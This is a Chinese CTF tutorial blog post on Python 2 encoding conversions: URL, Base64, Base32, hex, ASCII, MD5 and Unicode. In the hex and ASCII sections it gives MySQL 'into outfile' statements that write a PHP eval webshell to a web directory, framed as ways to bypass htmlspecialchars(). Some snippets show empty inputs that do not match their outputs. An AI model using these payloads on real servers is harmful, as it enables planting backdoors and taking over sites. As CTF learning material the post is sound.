Crypto(密码)之各种python编码转换

0x. 在一些CTF比赛中,会遇到各种编码,常常伴随着这些编码之间的各种转换。在刚入门那个时候,自己处理编码转换问题往往是“百度:url解码、base64加密、hex……”,或者是使用一款叫做“小葵多功能转换工具”等软件,再后来用Burpsuite的decoder功能,感觉用的还挺好的。

缺点:在线转换效率低,浪费时间(搜索占去了2/3的时间)、两款工具存在一些小问题,比如burpsuite中涉及中文往往显示乱码。

1x.各种编码+py

 0.url编码是一种浏览器用来打包表单输入的格式,%格式.,web方面用的比较多。推荐网站http://aubdiy.blog.51cto.com/2978849/815781

>>> from urllib import *

>>> quote("union select null,null,null")

'union%20select%20null%2Cnull%2Cnull'

>>> unquote("union%20select%20null%2Cnull%2Cnull")

'union select null,null,null'

>>> urlencode({'x':'2333','y':'666'})

'y=666&x=2333'

1.Base64常常用作网页表单和HTTP传输的一些参数,也常用于邮件协议传输用户信息等。输出文本末尾多为1或者2个=号

>>> import base64

>>> base64.b64encode("admin")

'YWRtaW4='

>>> base64.b64decode('YWRtaW4=')

'admin'

少数地方会涉及到Base32

>>> import base64

>>> base64.b32encode('jjjjj')

'NJVGU2TK'

>>> base64.b32decode('NJVGU2TK')

'jjjjj'

2.Hex: 十六进制编码也是web application中常见的一种编码方案。比如MySQL注入可以使用hex绕过htmlspecialchars()函数从而写入webshell。
比如:

[SQL] 

select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'

python实现hex加解密

>>> ''.encode('hex')

'3c3f70687020406576616c28245f504f53545b615d293b203f3e'

>>>

>>> print '3c3f70687020406576616c28245f504f53545b615d293b203f3e'.decode('hex')

3.Ascii很熟悉了,用了无数次了

MySQL中的char()函数则是转换ascii码的,可以使用这个特性来绕过htmlspecialchars()函数。
比如:

[SQL] 

select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php'

使用python将字符串转换ascii很简单,但是逆转换的话需要需要点小操作:

>>> map(ord, "")

[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]

 

>>> print chr(112)

p

 

>>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]

>>> print ''.join(map(chr,l))       #这里采用pcat表哥指出的方法

4.Md5

md5,不可逆性,大多数网站存储用户密码等关键数据时常常使用md5加密。有的时候我们提交payload需要md5加密,这个时候用下面的方法就可以轻松实现。当然解密的话推荐去cmd5。

>>> from hashlib import md5

>>> m = md5()

>>> m.update('this is a secret')

>>> m.hexdigest()

'7dbbcee180ba4d456e4aa1cfbdad9c7b'

 

>>> m.hexdigest()[8:-8]

'80ba4d456e4aa1cf'

>>>

5.unicode转换中文,用burp的话会存在中文乱码的问题,在python下实现非常简单。

>>> print u"\u4f60\u9700\u8981\u91cd\u65b0\u767b\u9646"

你需要重新登陆

-------------------------------------------------------------------------

现在ctf比赛中很需要python基础,python也很火,比如python工程师。

慢慢的摸索ctf中有关crypto的基础知识,后续更新。

-------------------------------------------------------------------------

加油,献给每一个为自己兴趣奋斗的家伙!


你可能感兴趣的:(Crypto(密码)之各种python编码转换)